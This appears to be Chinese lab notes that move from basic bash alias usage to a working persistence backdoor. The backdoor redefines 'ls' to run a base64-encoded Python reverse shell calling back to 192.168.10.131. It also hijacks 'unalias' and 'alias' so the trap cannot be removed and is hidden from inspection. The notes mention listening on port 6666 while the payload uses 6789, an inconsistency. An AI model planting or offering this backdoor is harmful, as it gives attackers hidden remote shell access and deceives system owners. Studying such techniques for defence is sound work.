alias
用法
系统默认别名:
alias
设置别名:
alias ls='ls -laih'
删除别名:
unalias ls
加参数:
alias ls='ls -laih;pwd'
❗注意
系统启动默认加载的配置文件:
切换用户就会执行/etc/profile
bash shell
每次打开新的shell时该文件都将被读取
每次退出系统(退出bash shell)时执行该文件
后门
命令
alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMzEiLCA2Nzg5KSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDApCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAxKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMikKICAgICAgICBwID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsICItaSJdKQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIGV4aXQoKQ=='\'')))";};alerts'
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts'
base64解码内容:
根据实际情况,修改细节:
实验过程中,发现没有python3,可以参考以下解决方案:
使用CentOS 7默认软件仓库安装
1、 更新系统包管理器:
2、安装Python 3:
3、验证安装是否成功:
执行ls,反弹shell到kali监听的6666端口
【目标机器】可以看到连接的信息,需要关闭【攻击机】的ssh,目标机器才会执行在攻击机上的命令
劫持了命令alias,查看显示ls='ls --color=auto'